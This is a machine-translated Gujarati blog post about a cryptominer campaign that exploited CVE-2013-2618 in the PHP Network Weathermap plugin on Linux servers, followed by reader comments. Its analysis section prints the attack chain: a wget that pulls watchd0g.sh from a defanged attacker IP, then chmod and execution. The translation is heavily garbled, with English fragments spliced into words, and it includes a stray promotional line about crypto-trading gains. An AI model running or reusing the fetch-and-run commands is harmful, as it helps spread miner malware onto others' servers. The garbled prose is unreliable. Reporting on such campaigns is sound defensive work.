આ થી ક્રિપ્ટોકરન્સી ખાણિયો રિમોટ કમ્પ્યુટરનો ઉપયોગ સાથે સત્તા વગર આના માલિકોનું વલણ બની રહ્યું છે. આ પ્રકારની પરિસ્થિતિ વિશે મેં બ્લોગ પર અહીં થોડા પ્રસંગો પર પહેલેથી જ વાત કરી હતી.
અને તે તે છે કે ક્રિપ્ટોક્યુરન્સીઝના ક્ષણથી આ પહેલાથી સંપૂર્ણપણે નિયંત્રણથી બહાર થઈ ગયું છે ખૂબ નોંધપાત્ર સ્થાન અને મૂલ્ય લીધું છે, જે લોકો તેમની સુરક્ષાનું ઉલ્લંઘન કરે છે તેવા કમ્પ્યુટર્સને toક્સેસ કરવા માટે પૂરતા જ્ knowledgeાન ધરાવતા લોકોએ નાણાકીય લાભ મેળવવા માટે મહત્વપૂર્ણ માહિતી અથવા બેંક એકાઉન્ટ્સ શોધવામાં સમયનો બગાડો મૂક્યો છે.
આ કરવાને બદલે તેઓ આ ટીમોને અંકુશમાં લેવાની અને તેમને માઇનીંગ નેટવર્કમાં એકીકૃત કરવામાં અને અન્ય કાર્યો માટે કે જે તેઓ સામાન્ય રીતે બોટનેટ સાથે કરે છે તેમાં સરળ વસ્તુ પસંદ કરે છે.
આ રીતે સામાન્ય રીતે તમને ભાડે આપવાનું વધુ છે, તેઓ ફક્ત આ પેદા કરેલા ત્વરિત નાણાં પર ધ્યાન કેન્દ્રિત કરી રહ્યાં છે.
બજારના વલણોની સ્માર્ટ સમજ અને ક્રિપ્ટો ટ્રેડિંગના યોગ્ય જ્ Withાન સાથે, કોઈ મહાન લાભ મેળવી શકે છે.
શું લિનક્સ ખરેખર સલામત સિસ્ટમ છે?
આપણામાંના ઘણાને ખ્યાલ છે કે લિનક્સ એ લગભગ સંપૂર્ણ સુરક્ષિત operatingપરેટિંગ સિસ્ટમ છે, વાસ્તવિકતા એ છે કે તેમાં હજી પણ કેટલીક ભૂલો છે.
વેલ છેકેટલાક દિવસ ટ્રેન્ડમાઇક્રોએ શોધ કરી, જેમાં જાહેર એક નવું લિનક્સ સિસ્ટમ્સમાં ખામી, જે હેકર્સને માઇનિંગ ક્રિપ્ટોક્યુરન્સીઝનો ફાયદો આપે છે લિનક્સ સર્વરો અને મશીનો વાપરીને.
તમારા બ્લોગ દ્વારા નિવેદનમાં તેઓએ નીચેની ટિપ્પણી કરી:
ઘટનાના પ્રતિભાવથી સંબંધિત અમારા નિરીક્ષણ દ્વારા, અમે ઘુસણખોરીના પ્રયત્નો અવલોકન કર્યા છે જેનાં સૂચકાંકો જેનકિન્સમિનર મ malલવેરનો ઉપયોગ કરતા અગાઉના ક્રિપ્ટોકરન્સી માઇનિંગ ઝુંબેશ સાથે સંકળાયેલા હતા.
તફાવત: આ ઝુંબેશ લિનક્સ સર્વરોને લક્ષ્ય બનાવી રહ્યું છે. તે ફરીથી વપરાયેલી નબળાઈઓનો ઉત્તમ કેસ પણ છે, કારણ કે તે જૂની સલામતી ખામીનું શોષણ કરે છે, જેનો પેચ લગભગ પાંચ વર્ષથી ઉપલબ્ધ છે.
તમારા વિશ્લેષણ દ્વારા આ પ્રકાશનમાં અસરગ્રસ્ત સાઇટ્સને ઓળખવામાં વ્યવસ્થાપિત આ નિષ્ફળતા માટે તે મુખ્યત્વે જાપાન, તાઇવાન, ચીન, યુએસએ અને ભારતને અસર કરે છે.
હુમલો વિશ્લેષણ
વિશ્લેષણ દ્વારા ટ્રેન્ડ માઇક્રો સ્માર્ટ પ્રોટેક્શન નેટવર્ક દ્વારા હુમલાખોરો આ ખામીનો લાભ કેવી રીતે લે છે તેના પર થોડી વિગતવાર:
આ ઝુંબેશના સંચાલકો સીવીઇ -2013-2618, જે કામપી નેટવર્ક વેધરમેપ પ્લગઇનમાં નબળાઈઓનું દુરુપયોગ કરી રહ્યા હતા, જેનો સિસ્ટમ સંચાલકો નેટવર્ક પ્રવૃત્તિને જોવા માટે ઉપયોગ કરે છે.
તેઓ શા માટે જુના સુરક્ષા ખામીનો દુરૂપયોગ કરી રહ્યા છે: નેટવર્ક વેધરમેપમાં જૂન 2014 થી અત્યાર સુધીમાં ફક્ત બે જાહેરમાં નોંધાયેલ નબળાઈઓ છે.
આ હુમલાખોરો ફક્ત સુરક્ષા ક્ષતિનો જ ફાયદો ઉઠાવી શકે છે જેના માટે એક શોષણ ઉપલબ્ધ છે, પણ પેચ વિલંબ પણ જે ઓપન સોર્સ ટૂલની મદદથી સંસ્થાઓમાં થાય છે.
મૂળભૂત રીતે હુમલો એક એક્સએસએસ હુમલો દ્વારા છે:
અસ્પષ્ટ ભાગ એ એટેક લક્ષ્ય છે, બંદર સાથેનો વેબ સર્વર.
ફાઇલ /plugins/weathermap/configs/conn.php એ સતત XSS એટેકના પરિણામ રૂપે ફાઇલ છે / પ્લગઇન્સ / વેધરમેપ / પીએચપી .
ઉપરાંત કને.એફપીપી શરૂઆતમાં, આપણે એક સમાન એચટીટીપી વિનંતી જોઈશું જેનું નામ 'પૃષ્ઠ' પર છે cools.php '.
માઈન ક્રિપ્ટોકરન્સીઝનો પ્રોગ્રામ નબળાઈ દ્વારા વિતરિત કરવામાં આવે છે લિનક્સ સર્વરો છે તેવા લક્ષ્યો પરના PHP હવામાન નકશામાંથી
છબીમાં તમે જોઈ શકો છો કે હુમલો કેવી રીતે પેદા થાય છે અને તેનું વર્ણન નીચે મુજબ છે:
wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh
તે શું કરે છે તે વિજેટ સાથે ફાઇલ ડાઉનલોડ કરવા માટે સંકેત મોકલે છે, જે એક યુટિલિટી છે કે જે લગભગ તમામ લિનક્સ ડિસ્ટ્રિબ્યુશંસ ડિફ .લ્ટ રૂપે ઇન્સ્ટોલ કરેલી છે.
chmod 775 watchd0g.sh
ફાઈલને એક્ઝેક્યુટેબલ બનાવે છે
./watchd0g.sh
તે આખરે કરે છે તે ફાઇલને સર્વર પર ચલાવવાનું છે.
સદનસીબે, ત્યાં પેચ પહેલેથી જ છે ( CVE-2013-2618 ) નિષ્ફળતા માટે ઉપલબ્ધ અને તમે તેને ડાઉનલોડ કરી શકો છો થી આ લિંક
Si તમે તેના વિશે વધુ જાણવા માંગો છો આ નિષ્ફળતાની તમે આ લિંકની મુલાકાત લઈ શકો છો.
સ્રોત: ક્રિપ્ટોકરન્સી ખાણિયો પીએચપી વેધરમેપ નબળાઈ દ્વારા વિતરિત, લિનક્સ સર્વર્સને લક્ષ્યાંકિત કરે છે
મૂર્ખ બનવું સલામત નથી, અને તે છતાં લિનક્સ તમને બચાવે છે.
સિક્યુરિટી પેચોને અપડેટ ન કરવું એ લિનક્સની ભૂલ નથી. તે દોષ છે કે કેટલીક કંપનીઓ, પૈસા બચાવવા માટે, ઇડિઅટ્સને સિસ્ટમ સંચાલકો તરીકે ભાડે રાખે છે,
પરંતુ તેમ છતાં, તે તુરંત જ શોધાયેલ છે અને તરત જ હલ કરવામાં આવે છે, આ જેવી કોઈ નાની સુરક્ષા ઘટના પણ પ્રકાશિત થાય છે.
અને લિનક્સમાં તેમાં શું ખામી છે કે તેના અપડેટ્સ લાગુ થયા નથી? જીએનયુ / લિનક્સ વિકાસકર્તાઓ .ભરતી નબળાઈઓનો ઉકેલો વિકસિત કરીને અને વપરાશકર્તાઓ માટે ઉપલબ્ધ બનાવીને તેમનું કાર્ય કરે છે. જો ડ doctorક્ટર ફલૂની રસી સૂચવે છે અને તમને તે નથી મળતું, તો તમે માંદા અને સખત થઈ જાઓ છો ... તે ડ doctorક્ટરની ભૂલ છે?
DesdeLinux તે જે હતું તે નથી, બે મહત્વપૂર્ણ ભૂલો સાથે સળંગ બે સમાચાર વાર્તાઓ:
1.- વિકસાવવા માટે વધુ સારા સંપાદકોમાં તેઓ એક એવું મૂકો જે મફત સ softwareફ્ટવેર નથી અને તેઓ બીજાને ભૂલી જાય છે (તેઓ ટિપ્પણીઓમાં ટાંકવામાં આવે છે).
2.- વાયરસ વિશેના ગંભીર સમાચાર જ્યારે તેઓ ફક્ત કોઈ પણ અપડેટ કરેલા સર્વરોને અસર કરે છે. પરંતુ જો કોઈ પણ લિનક્સ દાયકાઓથી મૂળભૂત રીતે અપડેટ કરવામાં આવ્યું છે. ડર મૂકવા માટે જાણે કે વિંડોઝ-સ્ટાઇલ સકીંગ એન્ટીવાયરસની જરૂર હોય. તેઓ એવું કહેવાનો પ્રયત્ન કરે છે કે લિનક્સ વિન્ડોઝ જેવું જ છે, નહીં પણ.
જો ભૂલ જૂની છે અને પહેલેથી જ પેચો છે, તો તે ન તો કોઈ સમાચાર છે અથવા કંઈ નથી. માઇક્રોસ .ફ્ટ અને એન્ટિવાયરસ કંપનીઓ જેમ કે ટ્રેન્ડ માઇક્રો, નોર્ટન, પાંડા અથવા મAકffફી નહીં ચલાવો અથવા ચૂકવણી કરો નહીં.
માર્ગ દ્વારા, અમે કંપનીમાં ઘણાં વર્ષોથી ટ્રેન્ડ માઇક્રોનો ઉપયોગ કરી રહ્યાં હતાં અને તે એક વાસ્તવિક બટાકાની, છી હતી, કારણ કે તેની સિસ્ટમ કહે છે કે એક્ઝેક્યુટેબલને વાયરસના "નિશાન" હતા (એવી વસ્તુ જે વાયરસ હોઈ શકે છે, ભલે તે હતી) નથી) અને શા માટે તેને દૂર કર્યું (તે તેને ડિરેક્ટરીમાં લઈ ગયું જેથી તે ચાલશે નહીં) તેના ઉપયોગને મંજૂરી આપતા નથી, અને આ વર્તણૂકને સલામત એક્ઝેક્યુટેબલ ફાઇલ સાથે અનલ toક કરવા માટે અમારી પાસે કોઈ સફેદ સૂચિ નથી જેનો અમે ઉપયોગ કરવો જરૂરી છે . છી જાઓ. તે કોર્પોરેટ સંસ્કરણ હતું, વ્યક્તિગત સંસ્કરણમાં આ વ્હાઇટલિસ્ટની સંભાવના છે. દયનીય.
પોતાને એટલા મનોહરતાથી વર્ણવશો નહીં.
લેખ એ એક સુરક્ષા છિદ્ર વિશે વાત કરે છે જે તમને કોઈ પ્રોગ્રામમાં પ્રવેશવા દે છે, તેને એક્ઝિક્યુટેબલ બનાવે છે અને ચલાવે છે, જે તે સુરક્ષા છિદ્ર છે જે દરેક વાયરસને ફેલાવવાની જરૂર છે, દેખીતી રીતે તે દાખલ કરેલો પ્રોગ્રામ તેના કોડમાં હોવો જરૂરી છે repeatપરેશન અને સ્વ-નકલની પુનરાવર્તન માટે નેટવર્ક પરના કમ્પ્યુટર્સને સ્કેન કરવાની સંભાવના. તેઓ બરાબર આ કરતા નથી કારણ કે લિનક્સમાં શોધાયેલ સુરક્ષા છિદ્રો સુરક્ષા પેચ દ્વારા આવરી લેવામાં આવે છે, અને તે હું વિન્ડોઝ અને લિનક્સ વચ્ચેના તફાવત દ્વારા કહી રહ્યો છું, કારણ કે એન્ટિવાયરસ જરૂરી નથી, પરંતુ છિદ્રને coverાંકવા માટે. વિંડોઝમાં કેટલાક કારણોસર તે વધુ મુશ્કેલ છે: 1.- અસરગ્રસ્ત કમ્પ્યુટર પર તેમની રજૂઆત માટેનું એક પગલું દૂર કરીને, ફાઇલો ફક્ત તેમના વિસ્તરણને કારણે એક્ઝેક્યુટેબલ બની શકે છે. 2.- વપરાશકર્તાઓ સતત શંકાસ્પદ મૂળના પ્રોગ્રામ્સ ઇન્સ્ટોલ કરે છે કારણ કે તેઓ માલિકી ધરાવે છે અને તેમને પૈસા ચૂકવ્યા વિના રાખવાની જરૂર છે (એમએસ Officeફિસ, ફોટોશોપ, ખરીદવા માટે હોમ ઇકોનોમી માટે શું હશે તે હું કંઈપણ કહી રહ્યો નથી ... વધુ કમ્પ્યુટર સાધનોની કિંમત). -.- વહેલા અથવા પછીથી વિંડોઝ ફ્લશ થશે, વપરાશકર્તા તેને પાડોશી, મિત્ર, ... પર લઈ જાય છે, જે સમયનો બગાડ ન કરવા માટે, બધું ફોર્મેટ કરે છે અને વિંડોઝને એક એક્ટિવેશન પેચ સાથે ઇન્સ્ટોલ કરે છે જે અપડેટ થયેલ નથી અથવા પેચ પોતે જાસૂસ પ્રોગ્રામ મૂકે છે. તે હોઈ શકે છે કે તે નથી અને તે મહાન છે, પરંતુ તે હોઈ શકે છે અને તમારી પાસે તમારા પાસવર્ડ્સ પર વિન્ડોઝની જાસૂસી છે. લેખમાં તેઓ નબળાઈથી પ્રભાવિત લિનક્સમાં પરિચય સિસ્ટમનો ઉલ્લેખ કરે છે, પ્રોગ્રામ બનાવે છે જે આપમેળે નેટવર્ક સ્કેન કરે છે અને તેનો ઉપયોગ તેની નકલ કરવા માટે કરે છે અને સર્વર પર ચલાવે છે તે દરેક વસ્તુનો સૌથી સહેલો ભાગ છે, આ કારણોસર જે કહેવામાં આવ્યું છે લેખ એ કોઈપણ વાયરસ માટેનું સૌથી મહત્વપૂર્ણ પગલું છે: હુમલો કરવાની સિસ્ટમની નબળાઈને જાણીને.
ખરાબ માહિતી. આ લિનક્સમાં બગ નથી, તે PHP એપ્લિકેશનમાં ભૂલ છે, એટલે કે, તે મલ્ટીપ્લેટફોર્મ છે. તે લિનક્સ કર્નલ ચલાવતા સિસ્ટમો માટે પણ વિશિષ્ટ નથી! પણ જો એપ્લિકેશન ક્રોસ-પ્લેટફોર્મ ન હતી, તો તે લિનક્સ બગ નહીં હોય, તે ફક્ત એક એપ્લિકેશન હશે.
લિનક્સ કર્નલને આ જેવા ક્રોસ-સાઇટ સ્ક્રિપ્ટીંગ હુમલાઓ સામે રક્ષણ આપવામાં સહેજ પણ દખલ નથી. ઓછામાં ઓછું પોસ્ટ કરતા પહેલા પાંચ મિનિટની તપાસ કરો કારણ કે સત્ય એ છે કે જે કોઈ પણ વસ્તુ વિશે થોડું જાણે છે, તમે ખરાબ દેખાવા જઈ રહ્યા છો.